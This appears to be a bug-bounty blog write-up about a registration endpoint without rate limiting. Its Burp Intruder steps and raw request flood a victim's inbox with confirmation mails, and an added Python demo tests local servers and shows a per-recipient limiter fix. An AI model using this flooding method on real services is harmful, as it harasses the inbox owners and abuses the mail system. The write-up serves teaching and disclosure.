No Rate Limiting on a Confirmation Email Leads to Mass Mailings (Gives You a Small $$ Bounty or Hall of Fame)

ShuttlerTech
2 min read · Feb 28, 2023


Hello, Hunters. I know you are here because you are struggling or want to advance in your career. Believe me, things take time. Be consistent, continue to learn, and never deceive yourself. If you follow these three mantras, you will undoubtedly achieve success.

Rate Limiting:
If an endpoint has no rate limit, nothing stops a client from sending the same request many times in quick succession. The check is simple: replay the request 50, 100 or 1000 times, and if every repetition still succeeds (no 429, no CAPTCHA, no lockout, no change in the response), there is no rate limit.

URL Affected: https://xyz.my/index.php/apps/registration/

Steps to Reproduce:

  • Go to the URL https://xyz.my/index.php/apps/registration/
  • Enter the victim's email address in the registration form and submit it.
  • Send the captured request to Burp Intruder and clear all payload positions (§).
  • Set the payload type to Null payloads, enter the number of requests to generate, and click Start attack.
  • Boom: 1 million requests, and the victim's inbox receives a confirmation email for every one of them.
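As an added example (not code from the original post), the following Python script automates the check described in the steps above and puts the fix beside the bug. It starts two constructed in-process HTTP servers on loopback: one that "sends" a mail on every POST to /index.php/apps/registration/, and one behind a sliding-window limiter keyed on the recipient address. The limit of 3 mails per hour, the victim@example.com address, the TOKEN value and the in-memory outbox are assumptions for the demo, not details from the write-up. Replaying the same POST 20 times, which is exactly what Intruder with Null payloads does, yields 20 accepted requests against the first server and 3 accepted plus 17 `429 Too Many Requests` against the second.

```python
"""Added example, not from the original post: probe a confirmation-email
endpoint for a missing rate limit, against two constructed in-process
servers: one that mails on every POST (the bug) and one behind a
per-recipient sliding-window limiter (the fix)."""
import http.client
import threading
import time
import urllib.parse
from collections import defaultdict, deque
from http.server import BaseHTTPRequestHandler, HTTPServer

# Assumed policy (not from the post): at most 3 confirmation mails per recipient per hour.
MAX_PER_WINDOW = 3
WINDOW_SECONDS = 3600
PATH = "/index.php/apps/registration/"   # path from the write-up


class SlidingWindowLimiter:
    """Allow at most `limit` events per `window` seconds for each key."""

    def __init__(self, limit, window, clock=time.monotonic):
        self.limit, self.window, self.clock = limit, window, clock
        self.events = defaultdict(deque)
        self.lock = threading.Lock()

    def allow(self, key):
        now = self.clock()
        with self.lock:
            q = self.events[key]
            while q and now - q[0] >= self.window:   # drop events outside the window
                q.popleft()
            if len(q) >= self.limit:
                return False
            q.append(now)
            return True


def make_handler(limiter):
    """Build a registration handler; `limiter=None` reproduces the unthrottled bug."""

    class Handler(BaseHTTPRequestHandler):
        outbox = []   # constructed stand-in for the mail server: one entry per mail sent

        def do_POST(self):
            length = int(self.headers.get("Content-Length", 0))
            form = urllib.parse.parse_qs(self.rfile.read(length).decode())
            email = form.get("email", [""])[0].strip().lower()
            # Key on the recipient, not the client IP: the victim's inbox is what
            # needs protecting, and an attacker can rotate source addresses.
            if limiter is not None and not limiter.allow(email):
                self.send_response(429)
                self.send_header("Retry-After", str(WINDOW_SECONDS))
                self.end_headers()
                return
            Handler.outbox.append(email)
            body = b"<html>Confirmation mail sent</html>"
            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=UTF-8")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def log_message(self, *args):   # keep the demo output quiet
            pass

    return Handler


def probe(host, port, email, attempts):
    """Replay one registration POST `attempts` times, the same thing Intruder
    with Null payloads does, and count 200 (mail sent) versus 429 (throttled)."""
    body = urllib.parse.urlencode({"email": email, "requesttoken": "TOKEN"})
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    accepted = throttled = 0
    for _ in range(attempts):
        conn = http.client.HTTPConnection(host, port, timeout=5)
        conn.request("POST", PATH, body=body, headers=headers)
        resp = conn.getresponse()
        resp.read()
        conn.close()
        if resp.status == 200:
            accepted += 1
        elif resp.status == 429:
            throttled += 1
    return accepted, throttled


def demo(attempts=20):
    """Run the probe against the buggy and the fixed server; return
    {name: (accepted, throttled, mails_in_outbox)}."""
    results = {}
    for name, limiter in (("unlimited", None),
                          ("limited", SlidingWindowLimiter(MAX_PER_WINDOW, WINDOW_SECONDS))):
        handler = make_handler(limiter)
        server = HTTPServer(("127.0.0.1", 0), handler)
        threading.Thread(target=server.serve_forever, daemon=True).start()
        try:
            accepted, throttled = probe("127.0.0.1", server.server_address[1],
                                        "victim@example.com", attempts)
        finally:
            server.shutdown()
            server.server_close()
        results[name] = (accepted, throttled, len(handler.outbox))
    return results


if __name__ == "__main__":
    for name, (ok, thr, mails) in demo().items():
        print(f"{name}: {ok} accepted, {thr} throttled, {mails} mails in outbox")
```

Keying the limiter on the recipient rather than the client IP is deliberate: the victim's inbox is what needs protecting, and an attacker can spread requests over many source addresses. A production fix would keep the counters in a shared store and add a CAPTCHA or a growing back-off on top; the in-memory limiter here is only meant to show where the 429 comes from.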

Request part:

POST /index.php/apps/registration/ HTTP/1.1
Host: xyz.my
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Origin: null
Connection: close
Upgrade-Insecure-Requests: 1

email=victimattack%40gmail.com&requesttoken=Cdt30n8l%2FBhsd0fTp4wDDyvOvA26umsBZgymNLTrJWI%3D%3AZL8W4SURzVcIIAm06cNxOlm5jUrP1QloEW3RWO2SQQA%3D

With Null payloads and no payload positions marked, Intruder replays this exact request unchanged for as many iterations as you configure; the email parameter is the part that matters, since it selects the inbox that receives each confirmation mail. Note that a 200 with an HTML body does not by itself prove a mail went out: confirm it by pointing the email parameter at an inbox you control and counting the messages that arrive.

Response Part:

HTTP/1.1 200 OK
Date: Sat, 03 Oct 2020 11:58:21 GMT
Server: Apache/2.4.29 (Ubuntu)
Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
Referrer-Policy: no-referrer
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: none
X-XSS-Protection: 1; mode=block
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 13400
Connection: close
Content-Type: text/html; charset=UTF-8

Tips: Most of the time the company will downplay this vulnerability. In that case, show the impact by sending a large burst of requests, with the email parameter set to an inbox you own rather than a real victim's. Even then, this class of bug is usually eligible for a two-digit bounty at most.

Thank you for reading! I hope you picked up a few tricks.

Subscribe to the Shuttlertech YouTube channel for more content like this and to watch live POCs. To advance your career, connect with me 1:1 on topmate.
I promise to keep writing interesting, knowledge-sharing write-ups; to encourage me, follow me on Medium and click the clap icon.

Disclaimer: My write-ups come from my own findings and sometimes from different learning platforms. Do not use this methodology without the company's consent. I am sharing this for learning purposes only.
